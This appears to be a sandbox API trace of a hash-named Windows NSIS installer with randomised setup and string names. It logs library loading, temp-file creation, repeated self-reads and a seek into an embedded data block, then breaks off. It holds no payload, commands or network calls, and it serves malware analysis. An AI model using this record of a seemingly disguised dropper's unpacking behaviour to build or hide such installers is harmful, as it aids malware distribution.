GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0135.739] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.739] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0135.739] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x6c670000 [0135.759] GetProcAddress (hModule=0x6c670000, lpProcName="SHGetFolderPathW") returned 0x6c671d30 [0135.760] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x76ed0000 [0135.760] GetProcAddress (hModule=0x76ed0000, lpProcName=0x1b5) returned 0x76ee8dd0 [0135.760] IsOS (dwOS=0x1e) returned 1 [0135.761] InitCommonControls () [0135.761] OleInitialize (pvReserved=0x0) returned 0x0 [0135.807] SHGetFileInfoW (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fb8c, cbFileInfo=0x2b4, uFlags=0x0 | out: psfi=0x19fb8c) returned 0x1 [0135.929] lstrcpynW (in: lpString1=0x429220, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0135.929] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe\" " [0135.929] lstrcpynW (in: lpString1=0x435000, lpString2="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe\" ") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe\" " [0135.932] GetTempPathW (in: nBufferLength=0x400, lpBuffer=0x437800 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0135.940] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0135.940] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0135.940] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0135.942] GetLastError () returned 0xb7 [0135.942] GetTickCount () returned 0xf9207d [0135.942] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsd", uUnique=0x0, lpTempFileName=0x437000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsd207D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsd207d.tmp")) returned 0x207d [0135.944] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsd207D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsd207d.tmp")) returned 1 [0135.945] GetTickCount () returned 0xf9207d [0135.945] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x438800, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe")) returned 0x62 [0135.945] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe")) returned 0x20 [0135.946] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x210 [0135.946] lstrcpynW (in: lpString1=0x436800, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" [0135.946] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe") returned 98 [0135.949] lstrcpynW (in: lpString1=0x439000, lpString2="7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe", iMaxLength=1024 | out: lpString1="7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe") returned="7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19.exe" [0135.949] GetFileSize (in: hFile=0x210, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1efa8 [0135.950] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.950] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.951] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.952] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.953] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.954] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.955] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0135.955] SetFilePointer (in: hFile=0x210, lDistanceToMove=36892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x901c [0135.955] ReadFile (in: hFile=0x210, lpBuffer=0x19fb3c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x19fb3c*, lpNumberOfBytesRead=0x19fa7c*=0x4, lpOverlapped=0x0) returned 1 [0135.955] GetTickCount () returned 0xf9208c [0135.955] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x650, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19fa7c*=0x650, lpOverlapped=0x0) returned 1 [0135.985] GetTickCount () returned 0xf9209c [0135.985] GetTickCount () returned 0xf9209c [0135.985] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9670 [0135.985] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76410000 [0135.985] GetProcAddress (hModule=0x76410000, lpProcName="GetUserDefaultUILanguage") returned 0x7642b0a0 [0135.986] GetUserDefaultUILanguage () returned 0x409 [0135.989] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0135.989] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0135.989] lstrlenW (lpString="ojmozlcyua") returned 10 [0135.989] lstrcpynW (in: lpString1=0x429220, lpString2="ojmozlcyua Setup", iMaxLength=1024 | out: lpString1="ojmozlcyua Setup") returned="ojmozlcyua Setup" [0135.989] SetWindowTextW (hWnd=0x0, lpString="ojmozlcyua Setup") returned 0 [0135.989] lstrcpynW (in: lpString1=0x6632ac, lpString2="bptgtqrjvpq", iMaxLength=1024 | out: lpString1="bptgtqrjvpq") returned="bptgtqrjvpq" [0135.989] lstrcpynW (in: lpString1=0x663ac4, lpString2="mdtmlvddzpnx", iMaxLength=1024 | out: lpString1="mdtmlvddzpnx") returned="mdtmlvddzpnx" [0135.989] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0135.989] lstrcpynW (in: lpString1=0x425f10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0135.989] 